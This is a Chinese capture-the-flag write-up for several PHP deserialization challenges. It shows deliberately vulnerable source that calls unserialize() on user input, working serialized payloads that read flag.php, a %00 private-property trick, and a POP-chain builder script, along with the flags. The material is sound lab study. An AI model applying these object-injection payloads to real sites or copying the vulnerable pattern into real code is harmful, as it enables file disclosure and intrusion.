几道php反序列化解题记录

serialize01

源码：

<?php

class A{
    public $classname;
    function __toString(){
        echo file_get_contents($this->classname);
        return "";
    }
}

echo unserialize($_GET['a']);
highlight_file(__FILE__);

?>

writeup:

A类中有魔幻函数，index.php中unserialize函数参数可控
构造payload： O:1:"A":1:{s:9:"classname";s:8:"flag.php";}，反序列化之后，有一个classname变量，内容为flag.php。当index.php执行echo操作时，会自动触发A类中的__tostring()函数，然后通过echo file_get_contents($this->file)输出flag.php里面的内容

payload and flag:

http://8e023c5a6336fedd.synctf.com:8002/serialize/serialize01/index.php?a=O:1:"A":1:{s:9:"classname";s:8:"flag.php";}

<?php
$flag = "SYNCTF{SJshNZJ_Hasjcxzm}";
?>

serialize02

源码：

<?php

class A{
    public $classname;
    function __wakeup(){
        echo file_get_contents($this->classname);
        return "";
    }
}

unserialize($_GET['a']);
highlight_file(__FILE__);

?>

writeup:

flag在flag.php里面

A类中有魔幻函数，index.php中unserialize函数参数可控

构造payload： O:1:"A":1:{s:9:"classname";s:8:"flag.php";}，反序列化之后，有一个classname变量，内容为flag.php。当index.php执行echo操作时，会自动触发A类中的__wakeup()函数，然后通过echo file_get_contents($this->file)输出flag.php里面的内容

payload and flag:

http://8e023c5a6336fedd.synctf.com:8002/serialize/serialize02/index.php?a=O:1:%22A%22:1:{s:9:%22classname%22;s:8:%22flag.php%22;}

<?php
$flag = "SYNCTF{QPlMXHams_smAHSAJ}";
?>

serialize03

源码：

<?php

class A{
    public $classname;
    function __wakeup(){
        unserialize($this->classname);
        return '';
    }
}
class B{
    private $filename;
    function __wakeup(){
        echo file_get_contents($this->filename);
        return '';
    }
}

unserialize($_GET['a']);
highlight_file(__FILE__);

?>

writeup:

反序列化利用代码:
echo serialize(new A);
echo serialize(new B);

说明:

flag在flag.php里面

因为private是类名B两边都有%00所以同样在url上面体现

payload and flag:

payload: O:1:"A":1:{s:9:"classname";O:1:"B":1:{s:11:"%00B%00filename";s:8:"flag.php";};}

<?php
$flag = "SYNCTF{JSasjd_HJshhsh}";
?>

serialize05

源码：

<?php
class start_gg
{
        public $mod1;
        public $mod2;
        public function __destruct()
        {
                $this->mod1->test1();
        }
}
class Call
{
        public $mod1;
        public $mod2;
        public function test1()
    {
            $this->mod1->test2();
    }
}
class funct
{
        public $mod1;
        public $mod2;
        public function __call($test2,$arr)
        {
                $s1 = $this->mod1;
                $s1();
        }
}
class func
{
        public $mod1;
        public $mod2;
        public function __invoke()
        {
                $this->mod2 = "字符串拼接".$this->mod1;
        } 
}
class string1
{
        public $str1;
        public $str2;
        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class GetFlag
{
        public function get_flag()
        {
                echo "flag:"."xxxxxxxxxxxx";
        }
}
$a = $_GET['string'];
unserialize($a);
?>

writeup:

根据一层一层的关系写入来构造payload的代码,POP链构造：

<?php
class start_gg
{
        public $mod1;
        public $mod2;
        public function __construct()
        {
                $this->mod1 = new Call();
        }
        public function __destruct()
        {
                $this->mod1->test1();
        }
}
class Call
{
    public $mod1;
    public $mod2;
    public function __construct()
    {
            $this->mod1 = new funct();
    }
    public function test1()
    {
            $this->mod1->test2();
    }
}
class funct
{
        public $mod1;
        public $mod2;
        public function __construct()
        {
                $this->mod1 = new func();
        }
        public function __call($test2,$arr)
        {
                $s1 = $this->mod1;
                $s1();
        }
}
class func
{
        public $mod1;
        public $mod2;
        public function __construct()
        {
        	$this->mod1=new string1();
        }
        public function __invoke()
        {
                $this->mod2 = "字符串拼接".$this->mod1;
        }
}
class string1
{
        public $str1;
        public $str2;
        public function __construct()
        {
        	$this->str1=new GetFlag();
        }
        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class GetFlag
{
        public function get_flag()
        {
                echo "flag:"."xxxxxxxxxxxx";
        }
}
$a = new start_gg();
echo serialize($a);
?>

payload and flag:

O:8:"start_gg":2:{s:4:"mod1";O:4:"Call":2:{s:4:"mod1";O:5:"funct":2:{s:4:"mod1";O:4:"func":2:{s:4:"mod1";O:7:"string1":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}


SYNCTF{mlaALQ_KMjmajsd}